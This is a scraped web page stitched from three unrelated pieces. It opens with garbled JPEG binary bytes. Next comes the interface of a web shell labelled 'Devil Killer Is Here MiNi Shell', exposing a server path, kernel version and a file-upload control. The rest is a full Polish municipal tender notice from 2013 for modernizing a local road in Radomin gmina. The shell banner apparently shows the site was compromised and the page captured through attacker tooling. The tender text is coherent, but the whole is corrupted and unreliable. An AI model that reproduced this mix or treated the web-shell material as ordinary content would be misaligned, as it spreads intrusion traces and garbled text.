JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130709/267694-N-2013.html

<p class="kh_header"><b>Radomin: Modernizacja drogi gminnej -dojazdowej do gruntów rolnych, o długości 1,674  km w miejscowości Płonne i Rętwiny gmina Radomin</b><br>
<b>Numer ogłoszenia: 267694 - 2013; data zamieszczenia: 09.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Radomin , Radomin 1a, 87-404 Radomin, woj. kujawsko-pomorskie, tel. 056 6837522.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.radomin.pl      i      www.bip.radomin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja drogi gminnej -dojazdowej do gruntów rolnych, o długości 1,674  km w miejscowości Płonne i Rętwiny gmina Radomin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest  wykonanie modernizacji istniejącej drogi gminnej,
dojazdowej do gruntów rolnych, na długości 1,674 km o złym stanie technicznym nawierzchni, spowodowanym brakiem właściwych remontów oraz brakiem odwodnienia drogi. Na istniejącej drodze występują nierówności, przewężenia pasa  jezdnego oraz zawyżone i częściowo zakrzaczone pobocza.
 Modernizowana droga ma swój początek w miejscowości Płonne - km 0+000. 
Koniec modernizowanego odcinka - km 1+674 usytuowany jest  na skrzyżowaniu z drogą powiatową relacji Radomin  - Łubki   -   Płonne-Plebanka, w miejscowości Rętwiny.
Ewidencyjnie, droga położona jest na działce nr 116/1 w obrębie miejscowości Płonne,  oraz na działce 
Nr 33 w obrębie miejscowości Rętwiny,  Gmina Radomin.
	 Droga umożliwia bezpośredni dojazd do przyległych gruntów rolnych i zabudowań,   łączy miejscowość Płonne z miejscowością Rętwiny Gmina Radomin oraz  łączy się z innymi  drogami lokalnymi i wewnętrznymi. 
	Celem  wykonania modernizacji polegającej na remoncie  jest poprawa złego stanu, poprzez wykonanie nowej nawierzchni  z kruszywa betonowego i tłucznia oraz    powierzchniowego utrwalenia   emulsją asfaltową z  grysami. 
1.2 Planowane prace modernizacyjne:
	Planowana modernizacja drogi  polegać będzie na wykonaniu robót przygotowawczo- odwodnieniowych ( prace pomiarowe, mechaniczne ścięcie zawyżonych poboczy) i robot drogowo- nawierzchniowych  ( wyprofilowanie podłoża, zagęszczenie, poszerzenie pasa  drogowego, wykonanie nowej nawierzchni z gruzu  betonowego na warstwie odsączającej).
	Przebieg modernizowanej drogi projektowany jest w osi i w pasie drogi istniejącej  w terenie.
Mechaniczne profilowanie i zagęszczenie istniejącej nawierzchni o szerokości 3,0 m w km 0+000 - 1+674 związane jest z przygotowaniem podłoża poprzez likwidację pofalowań  i kolein przed wykonaniem nowej nawierzchni z  kruszywa betonowego i tłucznia.
Przekrój drogi z najważniejszymi parametrami, przedstawiono na załączonym rysunku -przekroju drogi  A-A.  
	1) Roboty pomiarowe:
Prace pomiarowe  przy liniowych  robotach ziemnych związanych z  wytyczeniem osi drogi , pasa jezdnego  o szerokości 4 mb i krawędzi poboczy. Długość odcinka drogi do  modernizacji wynosi 1,674 km
Uwaga: Wskazanym jest, by realizowany zakres robót modernizacyjnych, poprzedzony był koniecznie wytyczeniem geodezyjnym  drogi w celu wyznaczenia   granic  wykonania robót w pasie drogowym .

	2) Roboty  przygotowawcze i ziemne:
Roboty przygotowawcze to ścięcie spycharkami zawyżonych poboczy obustronnie  na całej  długości modernizowanego odcinka drogi o szerokości  0,5 m i grubości warstwy 10 cm , wraz z wywozem  pozyskanego gruntu samochodem samowyładowawczym  5t, na odległość do 1 km.  Zakres robót ziemnych obejmuje także  profilowanie i  zagęszczanie mechaniczne  podłoża pod warstwy konstrukcyjne nawierzchni.
Odwodnienie powierzchniowe  polega na odpowiednim wyprofilowaniu  nowej nawierzchni drogi, dla odprowadzenia wód opadowych z powierzchni drogi i poboczy oraz niedopuszczenie wód spływających z terenu, do korpusu drogowego. 
	Dla skutecznego  funkcjonowania drogi i odwodnienia, należy przyjąć spadki:
a) spadek dwustronny  jezdni  - 2 % na prostych odcinkach 
b) spadek jednostronny  jezdni - 3 % na łukach
c) spadek    poboczy ( szerokość 0,5 mb na każdej stronie drogi ) - 4% w kierunku otaczającego terenu 

	3) Nawierzchnia jezdni:
Zakres obejmuje wykonanie warstwy wyrównawczej z piasku -  grubość 10 cm po zagęszczeniu, wykonanie warstwy dolnej podbudowy z kruszywa betonowego -  grubość 20 cm po zagęszczeniu, górnej warstwy podbudowy  z tłucznia ( klińca) - grubość  5 cm po zagęszczeniu,. Nawierzchnia zostanie powierzchniowo utrwalona emulsją asfaltową  z grysem bazaltowym ( I sprysk i II sprysk). Szerokość nawierzchni jezdni wynosi 4 mb. 

	4) Pobocze: 
Po mechanicznym wyprofilowaniu, pobocza zostaną umocnione  warstwą o grubości  5 cm  z kruszywa łamanego ( kamienia łamanego ), na szerokości  0,50 mb ( po każdej stronie drogi ). Pozostałe 0,50 m od strony przyległych nieruchomości ( po każdej stronie ), zostaje jako pobocze gruntowe.

	5) Roboty wykończeniowe:
Zakres obejmuje ręczne ścinanie i karczowanie krzaków i podszyć średniej gęstości,  wykonanie rowów i plantowanie skarp z transportem urobku samochodami samowyładowczymi na odległość do 1km, ziemi zmagazynowanej w hałdach, ładowarkami        kołowymi. 
Powierzchnia rowów wynosi 5.022 m2.

1.3 Konstrukcja nawierzchni w km  0+000 - 1+674
	a) warstwa odsączająca z piasku:   grubość 10 cm po zagęszczeniu, szerokość 4,0 m 
	                                                            wykonana w technologii nawierzchni warstwy 
                                                                        odsączającej sposobem powierzchniowym,
	b)  warstwa podbudowy z kruszywa betonowego: sortowanego frakcji 1-63 mm wg 
                                                                         krzywej przesiewu, grub. 20 cm po zagęszczeniu,             
                                                                         szerokości 4,0 m,
	c) górna warstwa podbudowy:        z tłucznia ( kliniec) frakcji 0-31,5 mm, grubość 5 cm po 
                                                                         zagęszczeniu,  na szerokości 4,0 mb
	d)  powierzchniowe utrwalenie  grysami bazaltowymi: na szerokość 4,0 m
	                                             I sprysk  - emulsja 3,5 l/m2, grysy bazaltowe  8-11 mm -15 kg/m2
	                                            II sprysk  - emulsja 3,0 l/m2, grysy bazaltowe  5-8 mm -13 kg/m2

	e) wykonanie poboczy z kamienia łamanego  frakcji  0-31,5 mm, grubość 5 cm- szerokość  
                                                                          po 0,50m po obu  stronach drogi.


1.4. Parametry drogi:
1)szerokość  pasa drogowego  ogółem   -  6,0 mb
2) szerokość nawierzchni  do utwardzenia ( jezdni)   - 4,0 mb;
3) szerokość poboczy - 2 x 1,00 mb;
     w tym: a ) pobocze z  kamienia łamanego  - 2 x 0,5 mb
                  b) pobocze gruntowe ( bez utwardzenia)  - 2 x 0,5 mb
4) spadek poprzeczny nawierzchni drogi -  2  %  dwustronny na prostych odcinkach
5) spadek poprzeczny nawierzchni drogi -  3  %  jednostronny  na łukach drogi
6) spadek poprzeczny poboczy - 4,0  %
1.5. Zakres robót, wg tabeli elementów scalonych:
	1.1.   Roboty  pomiarowe
	1.2.   Roboty   ziemne
	1.3.   Nawierzchnia jezdni 
	1.4.   Pobocze
             1.5.   Roboty wykończeniowe

Szczegółowy  zakres robót  zawiera przedmiar robót - kosztorys ofertowy, jako materiał  do obliczenia ceny oferty i sporządzenia kosztorysu ofertowego wraz  z tabelą elementów scalonych. Sporządzony przez wykonawcę  i załączony do oferty, kosztorys ofertowy  wraz z tabelą elementów scalonych, stanowi dokument  dla oceny poprawności i prawidłowości sporządzenia i obliczenia ceny oferty. Specyfikacja Istotnych Warunków Zamówienia, przedmiar robót z tabelą elementów scalonych oraz projekt budowlany-uproszczona dokumentacja projektowa, dla wykonania  zadania,  udostępnione są na stronie internetowej  Urzędu Gminy Radomin: www.radomin.pl -BIP Radomin -przetargi zamówień publicznych, po uprzednim zamieszczeniu ogłoszenia w Biuletynie Zamówień Publicznych UZP. Wymienione dokumenty będą  także udostępniane wykonawcom w siedzibie zamawiającego -Urząd Gminy Radomin pok. Nr 15,  w godz. od 8:00 do 15:00 od poniedziałku do piątku. 
	Podane w załączonym projekcie budowlanym  oraz  w przedmiarze robót, ewentualne nazwy własne ( pochodzenie, producent) mają jedynie charakter pomocniczy dla określenia  podstawowych parametrów i cech zastosowanych materiałów. Zamawiający dopuszcza zastosowanie rozwiązań równoważnych. Produkt równoważny to taki, który  ma te same cechy funkcjonalne co, wskazany w dokumentacji,  konkretny  z nazwy lub pochodzenia produkt. Jego jakość nie może być gorsza, od jakości określonego w specyfikacji  produktu oraz powinien mieć parametry nie gorsze niż wskazany produkt.
	Cechy techniczne i jakościowe zastosowanych materiałów i rozwiązań powinny być zgodne  z Polskimi Normami przenoszonymi normy europejskie lub w przypadku uczestniczenia w przetargu firm zagranicznych,  normy innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy. 
 	Zamawiający zobowiązany jest do protokolarnego  przekazania placu budowy Wykonawcy, niezwłocznie po podpisaniu umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.11.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcą zamówienia określonego w niniejszym ogłoszeniu, w rozumieniu ustawy p.z.p, może być osoba fizyczna, osoba prawna albo jednostka organizacyjna nie posiadająca osobowości prawnej, która ubiega się o udzielenie zamówienia publicznego, złożyła ofertę lub zawarła umowę w sprawie zamówienia publicznego.
Ilekroć w Ogłoszeniu o zamówieniu  i tekście  poniżej,  wymienia się słowo   -Załącznik  Nr  - należy rozumieć jako Załącznik   do SIWZ

VII. 1.) W przetargu mogą wziąć udział wykonawcy spełniający warunki zawarte w art. 22 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych ( Dz. U. z 2010r. Nr 113 poz. 759 z późn. zmian.),  a mianowicie:
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Wykonawca składa oświadczenie o spełnianiu warunków w zakresie posiadania uprawnień do wykonywania zadań określonych w niniejszym zamówieniu.
Ocena spełnienia warunków wymaganych od Wykonawców, zostanie dokonana przez Zamawiającego w oparciu o zestawienie tych warunków, na zasadzie -spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca, który zamierza ubiegać się o udzielenie zamówienia publicznego wykaże, że zrealizował min 2 roboty budowlane, odpowiadające swoim rodzajem niniejszemu zamówieniu, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących  najważniejszych  robót określających, że  roboty te zostały wykonane w sposób należyty oraz wskazujących, że zostały wykonane  zgodnie  z zasadami  sztuki budowlanej i prawidłowo ukończone 
( poświadczenie odbiorcy wykonanych robót). Wartość każdej z  robót z osobna, powinna być nie niższa   niż  wartość  robót wykazanych w składanej ofercie ( brutto).
Ocena spełnienia warunków wymaganych od Wykonawców, zostanie dokonana przez Zamawiającego w oparciu o zestawienie tych warunków, na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że dysponuje odpowiednim potencjałem technicznym, wykonawca złoży oświadczenie (Załącznik Nr 2), o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust.1 ustawy  - Prawo zamówień publicznych.
Ocena spełniania warunków wymaganych od Wykonawców, zostanie dokonana przez Zamawiającego, w oparciu o zestawienie tych warunków, na zasadzie: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają kwalifikacje zawodowe, doświadczenie niezbędne do wykonania zamówienia oraz zakres wykonywanych przez nie czynności, a także informacje o podstawie do dysponowania tymi osobami. Wymagane jest złożenie oświadczenia, że osoby, które będą uczestniczyć                         w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy, w oparciu o które wykonywane będzie zamówienie, nakładają obowiązek posiadania takich uprawnień.
Kierownik budowy powinien legitymować się min. 2 letnim okresem kierowania robotami budowlanymi w zakresie objętym niniejszym zamówieniem ( uprawnienia i kierowanie robotami  w zakresie budowy  i remontów dróg) .
Ocena spełnienia warunków wymaganych od Wykonawców, zostanie dokonana przez Zamawiającego, w oparciu o zestawienie tych warunków, na zasadzie: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie zamówienia, wykaże, że posiada środki finansowe lub zdolność kredytową  dla zabezpieczenia wykonania zamówienia, w kwocie odpowiadającej co najmniej wartości  zamówienia w składanej  oferty.
	Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej (opłaconą polisę ubezpieczeniową) w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, w kwocie  odpowiadającej wartości zamówienia w składanej ofercie.
Ocena spełnienia warunków wymaganych od Wykonawców, zostanie dokonana przez Zamawiającego, w oparciu o zestawienie tych warunków, na zasadzie: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.radomin.pl  - BIP-  przetargi zamówień publicznych<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Radomin- Urząd Gminy Radomin, Radomin 1a, 87-404 Radomin, pok. Nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2013 godzina 12:00, miejsce: siedziba Urzędu Gminy Radomin, Radomin 1a, 87-404 Radomin, pok. Nr 8-  sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
